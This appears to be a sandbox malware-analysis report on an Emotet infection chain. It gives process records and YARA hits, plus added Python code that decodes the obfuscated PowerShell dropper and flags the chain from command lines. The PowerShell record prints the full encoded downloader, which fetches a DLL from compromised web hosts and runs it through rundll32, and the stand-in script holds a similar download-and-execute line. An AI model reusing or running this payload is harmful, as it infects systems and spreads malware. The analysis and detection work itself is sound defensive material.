                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Start time:08:48:40
                                      Start date:06/01/2021
                                      Path:C:\Windows\System32\msg.exe
                                      Wow64 process (32bit):false
                                      Commandline:msg user /v Word experienced an error trying to open the file.
                                      Imagebase:0xff630000
                                      File size:26112 bytes
                                      MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Start time:08:48:41
                                      Start date:06/01/2021
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANg
BBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKw
AnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA
                                      Imagebase:0x13f590000
                                      File size:473600 bytes
                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2096095535.0000000000296000.00000004.00000001.sdmp, Author: Florian Roth
                                      • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2096289799.0000000001BD6000.00000004.00000001.sdmp, Author: Florian Roth
                                      Reputation:high
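The -ENCOD argument above is -EncodedCommand abbreviated (powershell.exe accepts any unambiguous prefix), and its value is the base64 of the script's UTF-16LE text, which is why the blob is twice as long as the script. The decoded script assembles its strings with the -f format operator and shuffled indices ("{0}{2}{4}{3}{1}" -f 'SYSTe','CTORy','M','RE','.io.dI'), 'a'+'b' concatenation, and backtick-split method names such as "rePL`AcE"; the download list is a single string in which a placeholder stands in for the scheme, .replace()'d with "http" at run time and then split on [char](64), i.e. '@'. The Python below is an added example, not part of the report: it applies the same static passes to a constructed stand-in script (not the real blob) that uses those constructions and pulls the URL list out. petafilm.com/wp-admin/4m/ is the URL the sandbox actually saw fetched; example.invalid is made up.

```python
import base64
import re

# Constructed stand-in for the report's -ENCOD blob. It reproduces the tricks the
# real script uses: -f with reordered indices, 'a'+'b' splitting, backtick-broken
# method names, a scheme placeholder (]anw[3) replaced at run time, and '@' as the
# separator of the URL list. Only the first URL is from the report.
SAMPLE_PS = (
    "$T = [TYPE](\"{0}{2}{1}\" -f 'SYSTe','CTORy','M.io.dIRE'); "
    "$U = ((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')"
    "+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'s://ex')+('ample.inv'+'alid/x/'))"
    ".\"rePL`AcE\"(((']a'+'nw')+'['+'3'),'http').\"s`plIT\"('@'); "
    "foreach ($u in $U) { (New-Object System.Net.WebClient).\"dow`NloadFile\"($u, $P) }"
)
ENCODED = base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand (here abbreviated to -ENCOD) is base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


# 'a'+'b', 'a')+'b', 'a'+('b', 'a')+('b: join adjacent single-quoted fragments.
CONCAT = re.compile(r"'\)*\s*\+\s*\(*'")
# ("{0}{2}{1}" -f 'x','y','z') with literal arguments only.
FORMAT = re.compile(r'''(?i)\(\s*"([^"]*)"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)''')
# ."rePL`AcE"( : method names broken up with backticks inside double quotes.
METHOD = re.compile(r'\."([^"]+)"')


def _expand_format(m) -> str:
    args = re.findall(r"'([^']*)'", m.group(2))
    try:
        return "'" + m.group(1).format(*args) + "'"  # {n} means the same in Python
    except (IndexError, KeyError, ValueError):
        return m.group(0)


def deobfuscate(script: str) -> str:
    """Static pass only: nothing is executed, so -f [CHAR]92 or an [array](...)[1]
    index (the real script selects 'http' that way) is left as it is."""
    flat = CONCAT.sub("", script)
    flat = FORMAT.sub(_expand_format, flat)
    return METHOD.sub(lambda m: "." + m.group(1).replace("`", "").lower(), flat)


def extract_urls(flat: str) -> list:
    """Take the placeholder from the first .replace() argument, substitute it,
    split the URL blob on '@' and keep what parses as http(s)."""
    m = re.search(r"\.replace\(+'([^']+)'", flat)
    placeholder = m.group(1) if m else None
    urls = []
    for literal in re.findall(r"'([^']*)'", flat):
        if "://" not in literal:
            continue
        for part in literal.split("@"):
            if placeholder and part.startswith(placeholder):
                part = "http" + part[len(placeholder):]  # ]anw[3s:// -> https://
            if re.fullmatch(r"https?://[A-Za-z0-9.-]+(?:/\S*)?", part):
                urls.append(part)
    return urls


if __name__ == "__main__":
    flat = deobfuscate(decode_encoded_command(ENCODED))
    print(flat)
    print(extract_urls(flat))
```

The same three passes applied to the real blob leave the type names and the seven-URL list readable; what they will not resolve is anything that needs evaluation, such as the [array](...)[1] that yields the replacement string, which is why the placeholder is substituted from its position before :// rather than from that expression.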

                                      General

                                      Start time:08:48:44
                                      Start date:06/01/2021
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                      Imagebase:0xff2c0000
                                      File size:45568 bytes
                                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Start time:08:48:45
                                      Start date:06/01/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                      Imagebase:0xa40000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Author: Joe Security
                                      Reputation:moderate

                                      General

                                      Start time:08:48:46
                                      Start date:06/01/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL
                                      Imagebase:0xa40000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                      Reputation:moderate
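The process records above give the host-side chain to look for: cmd.exe invoked with a caret-escaped P^Ow^er^she^L^L, PowerShell in mixed case with -w hidden and an abbreviated -ENCOD, rundll32 asked for Control_RunDLL on a DLL under the user profile, then rundll32 again on a copy placed under C:\Windows\SysWOW64\<random>\<random>.<random extension>. The Python below is an added example, not the sandbox's own signature logic: it runs command-line checks over a constructed event list that reuses the report's command lines plus two benign controls. The encoded blob is a constructed stand-in, and the checks deliberately avoid parent-process assumptions because the report flags process creation via WMI, which would break a Word-to-cmd parent check.

```python
import base64
import ntpath
import re

# Constructed stand-in for the ~4 KB -ENCOD blob (same encoding: base64 of UTF-16LE).
SAMPLE_B64 = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://petafilm.com/wp-admin/4m/')".encode("utf-16-le")
).decode("ascii")

# (image path, command line). Events 0-4 are the command lines recorded in the
# report's System Behavior section; events 5 and 6 are constructed benign controls.
EVENTS = [
    (r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     r"'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding"),
    (r"C:\Windows\System32\cmd.exe",
     "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file."
     " & P^Ow^er^she^L^L -w hidden -ENCOD " + SAMPLE_B64),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "POwersheLL -w hidden -ENCOD " + SAMPLE_B64),
    (r"C:\Windows\System32\rundll32.exe",
     r"'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL"),
    (r"C:\Windows\SysWOW64\rundll32.exe",
     r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL"),
    (r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"),
]

POWERSHELL_TOKEN = re.compile(r"(?i)(?<!\w)(powershell)(?:\.exe)?\b")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -ENCOD ...).
ENCODED_PARAM = re.compile(r"(?i)(?:^|\s)-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_PARAM = re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden\b")
# rundll32 [<quoted or bare module path>][,| ]<export>
RUNDLL_ARGS = re.compile(r"(?i)rundll32(?:\.exe)?['\"]?\s+['\"]?([^'\",\s]+)['\"]?\s*,?\s*(\w+)")


def normalize_cmd(cmd: str) -> str:
    """Undo cmd.exe caret escaping: the child never sees the carets, so
    P^Ow^er^she^L^L is launched as POwersheLL."""
    return re.sub(r"\^(.)", r"\1", cmd)


def decode_encoded_command(b64: str):
    """Return the script text if b64 is base64 of printable UTF-16LE text, else None."""
    try:
        text = base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def classify(image: str, cmdline: str) -> list:
    """Detection names that fire for one process-creation event."""
    hits = []
    exe = ntpath.basename(image).lower()
    cmd = normalize_cmd(cmdline)
    if exe == "cmd.exe" and cmd != cmdline and POWERSHELL_TOKEN.search(cmd) \
            and not POWERSHELL_TOKEN.search(cmdline):
        hits.append("caret-obfuscated powershell launch via cmd.exe")
    for m in POWERSHELL_TOKEN.finditer(cmd):
        if m.group(1) not in ("powershell", "POWERSHELL", "PowerShell", "Powershell"):
            hits.append("powershell case anomaly: " + m.group(0))
            break
    enc = ENCODED_PARAM.search(cmd)
    if enc:
        script = decode_encoded_command(enc.group(1))
        if script is not None:
            hidden = " (hidden window)" if HIDDEN_PARAM.search(cmd) else ""
            hits.append("encoded powershell command" + hidden + ": " + script[:40])
    if exe == "rundll32.exe":
        m = RUNDLL_ARGS.search(cmd)
        if m and m.group(2).lower() == "control_rundll":
            module = m.group(1)
            ext = ntpath.splitext(module)[1].lower()
            if ext not in (".dll", ".cpl"):
                hits.append("rundll32 Control_RunDLL on a module with extension " + (ext or "(none)"))
            if "\\users\\" in module.lower():
                hits.append("rundll32 Control_RunDLL on a module under a user profile")
    return hits


def scan(events) -> list:
    return [classify(image, cmdline) for image, cmdline in events]


if __name__ == "__main__":
    for i, hits in enumerate(scan(EVENTS)):
        print(i, ntpath.basename(EVENTS[i][0]), hits or "-")
```

The extension check is the one that survives the renames: every later rundll32 in the report loads a randomly named file with a random extension from a random subdirectory of SysWOW64, and Control_RunDLL on anything that is not .dll or .cpl has no legitimate use there.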

                                      General

                                      Start time:08:48:47
                                      Start date:06/01/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL
                                      Imagebase:0xa40000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103478043.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Author: Joe Security
                                      Reputation:moderate

                                      General

                                      Start time:08:48:48
                                      Start date:06/01/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL
                                      Imagebase:0xa40000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105397432.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:moderate

                                      General

                                      Start time:08:48:49
                                      Start date:06/01/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL
                                      Imagebase:0xa40000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2347096157.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:moderate

                                      Disassembly

                                      Code Analysis